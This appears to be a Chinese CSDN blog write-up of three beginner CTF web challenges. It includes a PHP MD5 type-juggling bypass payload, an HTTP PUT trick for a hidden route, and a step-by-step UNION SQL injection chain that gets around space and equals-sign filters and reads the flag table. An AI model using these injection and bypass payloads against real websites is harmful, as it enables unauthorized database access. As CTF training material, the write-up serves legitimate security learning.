0X06

已于 2023-12-09 21:53:38 修改
阅读量91 收藏
点赞数
文章标签: 前端 linux 算法 web安全
于 2023-12-09 21:51:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75005708/article/details/134900553
版权

[NSSCTF 2022 Spring Recruit]babyphp

if(isset($_POST['a'])&&!preg_match('/[0-9]/',$_POST['a'])&&intval($_POST['a'])){
    if(isset($_POST['b1'])&&$_POST['b2']){
        if($_POST['b1']!=$_POST['b2']&&md5($_POST['b1'])===md5($_POST['b2'])){
            if($_POST['c1']!=$_POST['c2']&&is_string($_POST['c1'])&&is_string($_POST['c2'])&&md5($_POST['c1'])==md5($_POST['c2']))
 

 a,b1,b2都可以用数组绕过,因为a是正则绕过,b是MD5绕过

c1,c2都要是字符串,c1c2的MD5值要相等 所以c就不能用数组绕过,可以用科学计数法0e绕过

QNKCDZO
0e830400451993494058024219903391
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469

 payload

 a[]=0&b1[]=1&b2[]=2&c1=QNKCDZO&c2=s878926199a

 [GDOUCTF 2023]EZ WEB

点击按钮得到

看源码得到一个路径

 访问得到一个脚本

 路由与处理 HTTP PUT 请求的函数相关联。当向此路由发出 PUT 请求时,该函数会尝试打开并读取名为 的文件的内容。然后,将文件的内容作为响应返回。这意味着当向此特定路由发出 PUT 请求时,应用程序会公开文件的内容。/super-secret-route-nobody-will-guessflag()'flag''flag'
HTTP的8种请求方式及常用请求方式的解析_http请求-CSDN博客

用bp改方式

[SWPUCTF 2021 新生赛]sql

直接使用 # 作为注释符是没有用的,但是将其 url 编码为 %23 就好使啦。
1.注意到空格被过滤了,这个可以用 /**/ 绕过
2. 等号被过滤了可以使用 like 绕过
3.最后是读取 flag 的时候回显的长度有限制,substr、reverse、right 什么的也被过滤,最后用的是 mid!

最后组合起来就可以了。

步骤

/?wllm=1

/?wllm=1' //这两个是判断类型,是字符型 单引号闭合

%23是#的url编码 ,达到注释的结果

/?wllm=1' group by 3%23 //这里会提示我们进行了非法操作,应该是过滤了空格

这里是过滤了空格,我们用/**/来绕过

/?wllm=1'/**/group/**/by/**/3%23

/?wllm=1'/**/group/**/by/**/4%23 //4报错了, 判断得回显列数为3

到这里是 判断出回显列数,我们还要知道位置

/?wllm=-1'/**/union/**/select/**/1,2,3%23

爆库名

/?wllm=-1'/**/union/**/select/**/1,2,database()%23

爆表名 但是过滤了=,用like来绕过

/?wllm=-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()%23

爆字段名

/?wllm=-1'/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()%23

查询flag

/?wllm=-1'/**/union/**/select/**/1,2,group_concat(flag)/**/from/**/test_db.LTLT_flag%23

发现显示不全,我们使用substring连接

/?wllm=-1'/**/union/**/select/**/1,2,substring(group_concat(flag),1,30)/**/from/**/test_db.LTLT_flag%23

被过滤了,换mid试试 ,注意有三段, 注意:mid最大回显长度为20个字符

/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),1,20)/**/from/**/test_db.LTLT_flag%23
/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),21,20)/**/from/**/test_db.LTLT_flag%23
/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),41,20)/**/from/**/test_db.LTLT_flag%23

最后注意要截取三组,往往会漏掉第三组

芝诺的乌龟M
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C# Modbus通信从入门到精通(8)——Modbus RTU(0x06功能码与C#代码实现)
qq_34059233的博客
07-16 2279
本文详细介绍了ModbusRTU协议中0x06写单个寄存器功能码的原理、发送报文、返回报文、C#代码实现,由高级工程师多年经验总结而成,绝对干货!
0x06 真非真1
08-08
在IT安全领域,尤其是网络安全竞赛(如CTF,Capture The Flag)中,"0x06 真非真1"可能是指一个挑战任务,它涉及到对图像资源的深入分析和解密。在这个特定的场景中,我们面对的是一张名为"CTF1.jpg"的图片,但它并...
将0x06(16进制)转换为二进制
qq690452074的专栏
12-15 1391
将0x06(16进制)转换为二进制
ModBus协议-功能码-0x06
热门推荐
Andy's Blog
03-19 1万+
06 (0x06) Write Single Register This function code is used to write a single holding register in a remote device. The Request PDU specifies the address of the register to be written. Registers a
0x与H的区别
m0_55826123的博客
11-03 2788
0x是十六进制的前缀 H是十六进制的后缀 它们都是表示十六进制数,意义上没有什么区别,完全相等。至于什么时候用0x,什么时候用H,这取决于你在什么环境下使用,如果在C/C++,必须用0x来表示。在C语言中是不能用H的。 ...
51单片机LED数码管
qq_45764141的博客
04-09 2454
LED显示器分为共阴极(发光二极管所有的阴极连接在一起)和共阳极(所有的阳极都连接在一起)两种。 共阴高电平有效 共阳低电平有效 char led[] = {0x3f,0x06,0x5b,0x4f,0x4f,0x66,0x6d,0x7d,0x7f,0x6f}; 共阴接法0~9 共阳取反就行 静态显示 #include <REGX52.H> #include <intrins.h> unsigned char led[] = {0x3f,0x06,0x5b,0x4f,0x66,0x
0x06-openssh-5.9p1.patch.tar.gz
02-14
0x06-openssh-5.9p1.patch.tar.gz 是针对OpenSSH 5.9p1版本的一个特定补丁,它的主要目的是修复已知的安全漏洞或增强软件的功能。补丁文件通常包含一系列修改过的源代码,以更新原始程序。 在本案例中,描述中提到...
0x06-PE文件制作1
08-08
PE(Portable Executable)文件格式是Windows操作系统中用于存放可执行程序和动态链接库(DLL)的主要格式。它包含了代码、数据、资源和元数据等信息,使得程序能在Windows环境下运行。本实验旨在深入理解PE文件的...
microPython中实现Modbus通信支持各类触摸屏功能码有0x01\0x02\0x03\0x04\0x05\0x06等功能码
12-06
microPython中实现Modbus通信支持各类触摸屏功能码有0x01\0x02\0x03\0x04\0x05\0x06等功能码
0x06.第六课 Metasploit shodan搜索.pdf
06-24
0x06.第六课 Metasploit shodan搜索.pdf
OpenSNN推文:近期优质博客推荐汇总
opensnn的博客
07-12 392
国内个人博客站点众多,涵盖了技术、生活、艺术等多个领域。
更新商品前端接口编写
weixin_55639995的博客
07-12 418
那么在vue运行的时候,会加载所有的ref属性特征的元素还有组件。标签中ref的作用就是将 该组件注册到vue对象的ref属性中。使用插槽,那个scope就是代表着一行的数据。然后里面的选项遍历的是 js定义的数据。如果文字显示过多可以使用 文本隐藏显示。表单绑定还有表单数据的绑定。数据绑定使用的表单绑定状态。写form表单然后封装数据。状态的选择使用的是选择框。副标题使用的是文本域。状态页面使用,下拉框。富文本选择器使用组件。使用后端枚举类型去写。
Web前端-Web开发CSS基础6-弹性盒子
a15735748145a的博客
07-16 1139
10. stretch,这意味着弹性盒子在布局的时候,不论是一行一行地布局,还是一列一列地布局,垂直方向上的各元素都将会自动扩展,以填满父元素的高度。11. stretch,这意味着弹性盒子在布局的时候,不论是一行一行地布局,还是一列一列地布局,垂直方向上的各元素都将会自动扩展,以填满父元素的高度。12. stretch,这意味着弹性盒子在布局的时候,不论是一行一行地布局,还是一列一列地布局,垂直方向上的各元素都将会自动扩展,以填满父元素的高度。
中间件的理解
modi000的博客
07-15 226
直接返回,前置服务可以支持更高流量的并发,后置的需要耗时、耗力的,需要IO操作的服务,可以通过MQ慢慢处理。前端写消息的速率比后端处理消息的速率要快很多的。a.快递员角度:快递员无需将快递直接交到用户手里,放在菜鸟驿站即可走了,增加了送快递的数量,提高了送快递的效率;b.用户角度:快递到达的时候在上班,当时无时间取快递,当有了菜鸟驿站后,用户可以在下班闲暇时间去取快递。所以,中间件可以多个可能互相调用的系统耦合程度,提升接口的响应速度,。c.双十一的时候,快递量暴增,快递员不会手忙脚乱、用户可排序取快递。
cookies,sessionStorage和localStorage都有什么区别
qq_51856496的博客
07-17 217
cookies,sessionStorage和localStorage都有什么区别 cookies在请求数据传输的时候会携带至后台,sessionStorage,localStorage是纯客户端缓存 cookies有过期机制,sessionStorage是会话级缓存,窗口关闭后会销毁,localStorage是本地持久缓存手动才会清除 cookies只能存储4KB并且不推荐前端用js直接操作,sessionStorage,localStorage存储有5MB
【零基础】学JS之APIS第三天
大学生小郑的博客
07-12 1710
【零基础】学JS之APIS第三天
ReactRouter v6升级的步骤
feixin369的博客
07-14 385
React Router v6 引入了一个 Routes组件,它有点像Switch,但功能要强大得多。与Switch相比,RoutesReact.lazy。
(三)js前端开发中设计模式之工厂模式
最新发布
峰会路转的博客
07-17 206
工厂模式是一种创建型设计模式,它可以帮助我们根据需求创建对象。
前端工具-json-server
zhangankang的博客
07-14 159
以项目为例,介绍前端mock数据的方式;
0x06 labview
05-15
0x06是一个十六进制数,表示为补码形式为 0000 0110,转化成十进制则为6。而LabVIEW是一款由National Instruments公司开发的图形化编程软件,被广泛应用于工业自动化、测控、信号处理等领域。 在LabVIEW中,0x06...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值